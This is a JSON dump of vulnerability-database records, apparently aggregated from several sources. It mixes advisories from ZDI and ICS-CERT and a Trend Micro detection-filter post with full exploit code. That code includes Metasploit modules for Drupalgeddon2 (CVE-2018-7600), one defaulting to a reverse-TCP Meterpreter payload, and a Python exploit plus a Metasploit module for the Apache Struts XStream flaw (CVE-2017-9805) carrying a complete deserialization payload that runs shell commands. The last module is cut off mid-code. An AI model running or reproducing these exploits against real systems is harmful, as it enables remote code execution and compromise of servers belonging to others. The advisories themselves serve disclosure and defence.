"Drupalgeddon2 Drupal Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupalgeddon2', \n'Description' => %q{ \nCVE-2018-7600 / SA-CORE-2018-002 \nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 \nallows remote attackers to execute arbitrary code because of an issue affecting \nmultiple subsystems with default or common module configurations. \n \nThe module can load msf PHP arch payloads, using the php/base64 encoder. \n \nThe resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Vitalii Rudnykh', # initial PoC \n'Hans Topo', # further research and ruby port \n'JosA(c) Ignacio Rojo' # further research and msf module \n], \n'References' => \n[ \n['SA-CORE', '2018-002'], \n['CVE', '2018-7600'], \n], \n'DefaultOptions' => \n{ \n'encoder' => 'php/base64', \n'payload' => 'php/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => [ARCH_PHP], \n'Targets' => \n[ \n['User register form with exec', {}], \n], \n'DisclosureDate' => 'Apr 15 2018', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']), \n]) \n \nregister_advanced_options( \n[ \n \n]) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef exploit_user_register \ndata = Rex::MIME::Message.new \ndata.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"') \ndata.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"') \ndata.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"') \ndata.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"') \npost_data = data.to_s \n \n# /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri_path}user/register\", \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'vars_get' => { \n'element_parents' => 'account/mail/#value', \n'ajax_form' => '1', \n'_wrapper_format' => 'drupal_ajax', \n} \n}) \nend \n \n## \n# Main \n## \n \ndef exploit \ncase datastore['TARGET'] \nwhen 0 \nexploit_user_register \nelse \nfail_with(Failure::BadConfig, \"Invalid target selected.\") \nend \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147247/drupalgeddon2-exec.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdi": [{"lastseen": "2016-11-09T00:17:56", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Operations Manager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists due to a hidden account present within the Tomcat users XML file. Using this account a malicious user can access the org.apache.catalina.manager.HTMLManagerServlet class. This is defined within the catalina-manager.jar file installed with the product. This servlet allows a remote user to upload a file via a POST request to /manager/html/upload. If an attacker uploads malicious content it can then be accessed and executed on the server which leads to arbitrary code execution under the context of the SYSTEM user.", "modified": "2009-11-09T00:00:00", "published": "2009-11-20T00:00:00", "id": "ZDI-09-085", "href": "http://www.zerodayinitiative.com/advisories/ZDI-09-085", "title": "Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2020-01-29T04:26:45", "bulletinFamily": "info", "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-15-344-01A Advantech EKI Vulnerabilities that was published December 15, 2015, on the NCCIC/ICS-CERT web site.\n\n### **\\--------- Begin Update B Part 1 of 3 --------**\n\nHD Moore of Rapid7 identified several vulnerabilities in Advantech\u2019s EKI. Advantech has released updated firmware to mitigate these vulnerabilities.\n\n### **\\--------- End Update B Part 1 of 3 --------**\n\nThese vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nAdvantech reports that the vulnerability affects the following products:\n\n * EKI-132x platform devices.\n\n## IMPACT\n\nExploitation of these vulnerabilities may allow an attacker to execute arbitrary code, to obtain private keys, or to impersonate the authenticated user and perform a man-in-the-middle attack.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nAdvantech is based in Taiwan and has distribution offices in 21 countries worldwide.\n\nThe EKI-1200 series Modbus gateways are bidirectional gateways for integrating Modbus/RTU and Modbus/ASCII serial devices to TCP/IP networked-based devices. These products are deployed in industrial automation globally.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### OS COMMAND INJECTIONa\n\nGNU Bash Versions 1.14 through 4.3 contain a flaw that processes commands placed after function definitions in the added environment variable, allowing remote attackers to execute arbitrary code via a crafted environment, which enables network-based exploitation. This vulnerability is also known as \u201cShellShock.\u201db\n\nCVE-2014-6271c has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).d\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERe\n\nAdvantech EKI uses the OpenSSL cryptographic library and transport layer security (TLS) implementation Version 1.0.1, which is known to be vulnerable to the Heartbleed vulnerability.f\n\nCVE-2014-0160g has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).h\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERi\n\nStack-based buffer overflow in the get_packet method in socket.c in dhcpcd 3.2.3 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long packet.\n\nCVE-2012-2152j has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).k\n\n### **\\--------- Begin Update B Part 2 of 3 --------**\n\n### AUTHENTICATION BYPASS ISSUESl\n\nAn attacker is able to bypass authentication to access the device.\n\nCVE-2015-7938m has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).n\n\n### **\\--------- End Update B Part 2 of 3 --------**\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThese vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target these vulnerabilities are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\n### **\\--------- Begin Update B Part 3 of 3 --------**\n\nAdvantech has released a firmware update to mitigate these vulnerabilities in the EKI-132* product line on December 31, 2015. Users may download the latest firmware from the following location on Advantech\u2019s web site:\n\n[http://support.advantech.com.tw/Support/SearchResult.aspx?keyword=EKI-132*&amp;searchtabs=Firmware](<http://support.advantech.com.tw/Support/SearchResult.aspx?keyword=EKI-132*&searchtabs=Firmware>)\n\n### **\\--------- End Update B Part 3 of 3 --------**\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), http://cwe.mitre.org/data/definitions/78.html, web site last accessed December 10, 2015.\n * b. US-CERT Alert (TA14-268A) - GNU Bourne-Again Shell (Bash) \u2018Shellshock\u2019 Vulnerability, https://www.us-cert.gov/ncas/alerts/TA14-268A, web site last accessed December 10, 2015.\n * c. NVD, https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271, web site last accessed December 10, 2015.\n * d. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, web site last accessed December 10, 2015.\n * e. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed December 10, 2015.\n * f. US-CERT Alert (TA14-098A) - OpenSSL 'Heartbleed' vulnerability, https://www.us-cert.gov/ncas/alerts/TA14-098A, web site last accessed December 10, 2015.\n * g. NVD, https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed December 10, 2015.\n * h. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, web site last accessed December 10, 2015.\n * i. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed December 10, 2015.\n * j. NVD, https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2152, web site last accessed December 10, 2015.\n * k. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, web site last accessed December 10, 2015.\n * l. CWE-592: Authentication Bypass Issues, http://cwe.mitre.org/data/definitions/592.html, web site last accessed January 05, 2016.\n * m. NVD, https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7938, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * n. CVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, web site last accessed January 05, 2016.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://www.us-cert.gov/ics \nor incident reporting: https://www.us-cert.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-08-23T00:00:00", "published": "2015-12-10T00:00:00", "id": "ICSA-15-344-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-15-344-01", "title": "Advantech EKI Vulnerabilities (Update B)", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2017-09-08T17:15:49", "bulletinFamily": "blog", "description": "\n\nEarlier this week, a \u2018severe\u2019 vulnerability was discovered in Apache Struts, an open source framework for developing applications in Java. The vulnerability, CVE-2017-9805, affects all versions of Struts since 2008 and all applications using the framework\u2019s REST plugin are vulnerable. Trend Micro has released DVToolkit CSW file CVE-2017-9805.csw for the Apache Struts 2 Vulnerability to customers using TippingPoint solutions. The CSW file includes the following filters:\n\n \n\n**Filter C000001: HTTP: Apache Struts 2 XStreamHandler Command Injection Vulnerability **\n\nThis filter detects an attempt to exploit a command injection vulnerability in Apache Struts 2. The specific flaw exists due to a failure to properly validate requests sent to the REST plugin with the XStream handler. An attacker can leverage this vulnerability to execute code under the context of the application. _Note: This filter will be obsoleted by MainlineDV filter 29580._\n\n**Filter C000002: HTTP: Apache Struts 2 XStreamHandler Suspicious XML Command Usage**\n\nThis filter detects usage of suspicious XML objects. Apache Struts 2 is known to be vulnerable to command injection flaws when the REST plugin is used with the XStream handler. While not inherently malicious the serialized data can be used for command injection. _Note: This filter will be obsoleted by MainlineDV filter 29572._\n\nReferences:\n\n| \n\n * Common Vulnerabilities and Exposures: <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805>\n * SecurityFocus BugTraq ID: <http://www.securityfocus.com/bid/100609>\n * Vendor Advisory: <http://struts.apache.org/docs/s2-052.html> \n---|--- \n| \n \nCustomers who need the latest DVToolkit filters can visit the Threat Management Center (TMC) website at https://tmc.tippingpoint.com and navigate to Releases \u2192 CSW Files. For questions or technical assistance on any Trend Micro TippingPoint product, customers can contact the Trend Micro TippingPoint Technical Assistance Center (TAC).\n\n**Micro Focus Protect 2017**\n\nTrend Micro is a Gold Sponsor at the upcoming Micro Focus Protect 2017 conference in Washington, D.C. starting Monday, September 11 through Wednesday, September 13. In addition to live product demos, yours truly will also be speaking on Tuesday, September 12 at 1:30pm EDT featuring the topic \u201cPrioritize and Remediate the Threats that Matter the Most.\u201d Satinder Khasriya will also be speaking in the Expo Hall featuring the topic \u201cAchieve Groundbreaking Performance and Security Accuracy with Trend Micro TippingPoint.\u201d For more information on the event, click [here](<https://softwareevents.microfocus.com/protectindex>).\n\n**Zero-Day Filters**\n\nThere are seven new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Advantech (3)_**\n\n| \n\n * 29540: ZDI-CAN-4994: Zero Day Initiative Vulnerability (Advantech WebAccess)\n * 29542: ZDI-CAN-4995: Zero Day Initiative Vulnerability (Advantech WebAccess)\n * 29543: ZDI-CAN-4996: Zero Day Initiative Vulnerability (Advantech WebAccess) \n---|--- \n| \n \n**_Foxit (3)_**\n\n| \n\n * 29523: ZDI-CAN-4979: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29524: ZDI-CAN-4980: Zero Day Initiative Vulnerability (Foxit Reader)\n * 29531: ZDI-CAN-4981: Zero Day Initiative Vulnerability (Foxit Reader) \n---|--- \n| \n \n**_Hewlett Packard Enterprise (1)_**\n\n| \n\n * 29513: HTTP: HPE Intelligent Management Center ictExpertDownload Code Execution Vulnerability (ZDI-17-663) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-august-28-2017/>).", "modified": "2017-09-08T14:23:58", "published": "2017-09-08T14:23:58", "id": "TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-september-4-2017/", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of September 4, 2017", "type": "trendmicroblog", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-04T13:04:10", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://0day.today/exploit/description/28445", "id": "1337DAY-ID-28445", "title": "Apache Struts 2.5 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE\r\n# Google Dork: filetype:action\r\n# Date: 06/09/2017\r\n# Exploit Author: Warflop\r\n# Vendor Homepage: https://struts.apache.org/\r\n# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip\r\n# Version: Struts 2.5 \u2013 Struts 2.5.12\r\n# Tested on: Struts 2.5.10\r\n# CVE : 2017-9805\r\n \r\n#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# Struts CVE-2017-9805 Exploit\r\n# Warflop (http://securityattack.com.br/)\r\n# Greetz: Pimps & G4mbl3r\r\n# *****************************************************\r\nimport requests\r\nimport sys\r\n \r\ndef exploration(command):\r\n \r\n exploit = '''\r\n <map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>foo</name>\r\n </filter>\r\n <next class=\"string\">foo</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer/>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n </map>\r\n '''\r\n \r\n \r\n url = sys.argv[1]\r\n \r\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',\r\n 'Content-Type': 'application/xml'}\r\n \r\n request = requests.post(url, data=exploit, headers=headers)\r\n print request.text\r\n \r\nif len(sys.argv) < 3:\r\n print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')\r\n print ('[*] Warflop - http://securityattack.com.br')\r\n print ('[*] Greatz: Pimps & G4mbl3r')\r\n print ('[*] Use: python struts2.py URL COMMAND')\r\n print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')\r\n exit(0)\r\nelse:\r\n exploration(sys.argv[2])\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28445"}, {"lastseen": "2018-04-15T07:48:17", "bulletinFamily": "exploit", "description": "Apache Struts versions 2.5 through 2.5.12 using the REST plugin are vulnerable to a Java deserialization attack in the XStream library.", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://0day.today/exploit/description/28454", "id": "1337DAY-ID-28454", "title": "Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 REST Plugin XStream RCE',\r\n 'Description' => %q{\r\n Apache Struts versions 2.5 through 2.5.12 using the REST plugin are\r\n vulnerable to a Java deserialization attack in the XStream library.\r\n },\r\n 'Author' => [\r\n 'Man Yue Mo', # Vulnerability discovery\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-9805'],\r\n ['URL', 'https://struts.apache.org/docs/s2-052.html'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'],\r\n ['URL', 'https://github.com/mbechler/marshalsec']\r\n ],\r\n 'DisclosureDate' => 'Sep 5 2017',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix', 'python', 'linux', 'win'],\r\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n ['Unix (In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n ],\r\n ['Python (In-Memory)',\r\n 'Platform' => 'python',\r\n 'Arch' => ARCH_PYTHON\r\n ],\r\n ['PowerShell (In-Memory)',\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64]\r\n ],\r\n ['Linux (Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64]\r\n ],\r\n ['Windows (Dropper)',\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64]\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'ctype' => 'application/xml',\r\n 'data' => random_crap\r\n )\r\n\r\n if res && res.code == 500 && res.body.include?('xstream')\r\n CheckCode::Appears\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case target.name\r\n when /Unix/, /Python/, /PowerShell/\r\n execute_command(payload.encoded)\r\n else\r\n execute_cmdstager\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n case target.name\r\n when /Unix/, /Linux/\r\n cmd = %W{/bin/sh -c #{cmd}}\r\n when /Python/\r\n cmd = %W{python -c #{cmd}}\r\n when /PowerShell/\r\n # This shit doesn't work yet\r\n require 'pry'; binding.pry\r\n cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}\r\n when /Windows/\r\n cmd = %W{cmd.exe /c #{cmd}}\r\n end\r\n\r\n # Encode each command argument with HTML entities\r\n cmd.map! { |arg| Rex::Text.html_encode(arg) }\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => target_uri.path,\r\n 'ctype' => 'application/xml',\r\n 'data' => xstream_payload(cmd)\r\n )\r\n end\r\n\r\n # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO\r\n def xstream_payload(cmd)\r\n # XXX: <spillLength> and <read> need to be removed for Windows\r\n <<EOF\r\n<map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>#{cmd.join('</string><string>')}</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>#{random_crap}</name>\r\n </filter>\r\n <next class=\"string\">#{random_crap}</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer></ibuffer>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n</map>\r\nEOF\r\n end\r\n\r\n def random_crap\r\n Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-15] #", "sourceHref": "https://0day.today/exploit/28454", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-26T23:26:54", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "modified": "2018-04-26T00:00:00", "published": "2018-04-26T00:00:00", "href": "https://0day.today/exploit/description/30268", "id": "1337DAY-ID-30268", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # XXX: CmdStager can't handle badchars\r\n include Msf::Exploit::PhpEXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\r\n 'Description' => %q{\r\n This module exploits a Drupal property injection in the Forms API.\r\n\r\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\r\n },\r\n 'Author' => [\r\n 'Jasper Mattsson', # Vulnerability discovery\r\n 'a2u', # Proof of concept (Drupal 8.x)\r\n 'Nixawk', # Proof of concept (Drupal 8.x)\r\n 'FireFart', # Proof of concept (Drupal 7.x)\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-7600'],\r\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\r\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\r\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\r\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\r\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\r\n ['URL', 'https://github.com/FireFart/CVE-2018-7600'],\r\n ['AKA', 'SA-CORE-2018-002'],\r\n ['AKA', 'Drupalgeddon 2']\r\n ],\r\n 'DisclosureDate' => 'Mar 28 2018',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'linux'],\r\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'Payload' => {'BadChars' => '&>\\''},\r\n # XXX: Using \"x\" in Gem::Version::new isn't technically appropriate\r\n 'Targets' => [\r\n #\r\n # Automatic targets (PHP, cmd/unix, native)\r\n #\r\n ['Automatic (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_memory\r\n ],\r\n ['Automatic (PHP Dropper)',\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Type' => :php_dropper\r\n ],\r\n ['Automatic (Unix In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory\r\n ],\r\n ['Automatic (Linux Dropper)',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 